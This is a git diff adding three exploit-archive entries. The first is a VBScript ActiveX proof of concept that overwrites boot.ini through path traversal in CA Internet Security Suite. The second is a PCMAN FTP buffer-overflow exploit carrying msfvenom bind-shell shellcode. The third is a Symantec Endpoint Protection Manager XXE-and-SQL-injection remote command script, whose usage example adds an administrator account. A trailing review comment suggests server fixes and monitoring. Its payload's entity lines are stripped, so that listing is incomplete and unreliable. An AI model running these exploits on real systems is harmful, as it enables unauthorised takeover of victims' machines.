index 000000000..a2198c8ed
--- /dev/null
+++ b/platforms/windows/dos/31856.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/29406/info
+
+A Computer Associates Internet Security Suite ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
+
+Successful exploits will compromise affected computers and will aid in further attacks.
+
+Internet Security Suite 2008 is vulnerable; other versions may also be affected.
+
+
+<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE'
+id='UmxEventCliLib'/>
+</object><script language='vbscript'>
+filePath="..\..\..\..\..\..\..\boot.ini"
+UmxEventCliLib.SaveToFile filePath
+</script></html>
+
+
diff --git a/platforms/windows/remote/31789.py b/platforms/windows/remote/31789.py
new file mode 100755
index 000000000..ca9c1ca40
--- /dev/null
+++ b/platforms/windows/remote/31789.py
@@ -0,0 +1,66 @@
+# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
+# Date: Feb 19, 2014
+# Exploit Author: Sumit
+# Version: 2.07
+# Tested on: Windows XP Professional SP3
+# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
+#
+
+import socket
+import datetime
+
+"""
+You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
+2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
+"""
+
+host = '192.168.213.10'
+
+d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
+for i in range(len(d)): d[i] = str(int(d[i]))
+d = '/'.join(d) # Finally we got the date
+
+# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
+shellcode = (
+"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
+"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
+"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
+"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
+"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
+"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
+"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
+"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
+"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
+"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
+"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
+"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
+"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
+"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
+"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
+"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
+"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
+"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
+"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
+"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
+"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
+"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
+"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
+"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
+"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
+"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
+"\x18\x37\x4e\x32")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, 21))
+
+nop = '\x90'*50
+eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
+myip = s.getsockname()[0]
+padding = 'A' * (2029 - (len(d) + len(myip)))
+
+buf = padding + eip + nop + shellcode
+
+s.send('%s\r\n' % (buf))
+s.recv(1024)
+print 'Payload sent'
+s.close()
diff --git a/platforms/windows/remote/31853.py b/platforms/windows/remote/31853.py
new file mode 100755
index 000000000..0391e7ab2
--- /dev/null
+++ b/platforms/windows/remote/31853.py
@@ -0,0 +1,83 @@
+import argparse
+import httplib
+
+"""
+Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution
+Exploit Author: Chris Graham @cgrahamseven
+CVE: CVE-2013-5014, CVE-2013-5015
+Date: February 22, 2014
+Vendor Homepage: http://www.symantec.com/endpoint-protection
+Version: 11.0, 12.0, 12.1
+Tested On: Windows Server 2003, default SEPM install using embedded database
+References: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt
+http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00
+Details:
+
+First off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE
+injection to force SEPM to exploit itself through a separate SQL injection flaw was
+particularly amusing. I suspect the majority of SEPM users will have it configured
+with the default embedded database, thereby making this a pretty reliable exploit.
+
+So basically what you are looking for with the XXE injection is a vulnerability
+that can be triggered in the ConsoleServlet. When a multipart http request is sent,
+the servlet will use a custom MultipartParser class to handle the individual
+multipart bodies. When a body is encountered that uses a Content-Type of text/xml,
+the Java DocumentBuilder class is used to parse the xml. Since Symantec did not
+disallow declared DTD processing, it is vulnerable to the XXE injection. This
+appears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.
+That leads us to the SQL injection flaw.
+
+Symantec has an http request handler called ConfigServerHandler that is programmatically
+restricted to only handle requests that come from localhost. I guess when they wrote this
+they just assumed that there was never going to be a way to send untrusted input to it
+since it was always going to be controlled by them. I base this guess on the fact that
+there is absolutely no attempt made to validate what input comes in to the
+updateReportingVersion function which shoves it directly into a SQL query unfiltered. In
+order to trigger the SQL injection you just need to send the SQL injection string in the
+"Parameter" url param with the "action" param set to test_av. On a default install of SEPM,
+it uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell
+stored procedure to run local OS commands. Using this stored procedure, you can compromise
+the server that is running SEPM.
+
+Example Usage:
+python sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add"
+python sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add"
+"""
+
+multipart_body = \
+"------=_Part_156_33010715.1234\r\n" + \
+"Content-Type: text/xml\r\n" + \
+"Content-Disposition: form-data; name=\"Content\"\r\n\r\n" + \
+"\r\n" + \
+"]>\r\n" + \
+"\r\n" + \
+"&payload;\r\n" + \
+"\r\n" + \
+"------=_Part_156_33010715.1234--\r\n"
+headers = {'Content-Type':"multipart/form-data; boundary=\"----=_Part_156_33010715.1234\""}
+
+cmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \
+' Remote Command Execution')
+cmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)
+cmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \
+type=int, required=False)
+cmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \
+default=0, type=int, required=False)
+cmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \
+required=True)
+args = cmdline_parser.parse_args()
+
+if args.ssl == 1:
+ conn = httplib.HTTPSConnection(args.ip, args.port)
+else:
+ conn = httplib.HTTPConnection(args.ip, args.port)
+multipart_body = multipart_body % (args.cmd)
+print "\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd
+conn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers)
+res = conn.getresponse()
+if res.status != 200:
+ print "[-]Exploit unsuccessful! Server returned:\n" + res.read()
+else:
+ print "[+]Exploit successfully sent!"
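Review bot: The header explains the vulnerability chain well but never states the server-side fixes or what to monitor, and the request the script sends makes both concrete. The XXE half is reached through a multipart part with `Content-Type: text/xml` POSTed to `/servlet/ConsoleServlet?ActionType=ConsoleLog`, and the description itself says DTD processing was left enabled in `DocumentBuilder`, so the code fix is to disable DOCTYPE declarations and external entities on the `DocumentBuilderFactory` (the `http://apache.org/xml/features/disallow-doctype-decl` feature), while the SQL half in `updateReportingVersion` needs a bound parameter instead of string concatenation and `xp_cmdshell` should be disabled on the embedded SQL Anywhere instance. For monitoring, multipart POSTs to that servlet whose text/xml part carries a DOCTYPE, and ConfigServerHandler requests with `action=test_av` whose `Parameter` value contains SQL syntax, are the handles; the vendor advisory linked in the header (`suid=20140213_00`, CVE-2013-5014 / CVE-2013-5015) is the patch reference, and a `Mitigation:` line citing it belongs in the header block. Separately, the entity-definition lines of `multipart_body` appear to have been stripped on this page (only `]>` survives), so the listing as shown does not reflect the committed file.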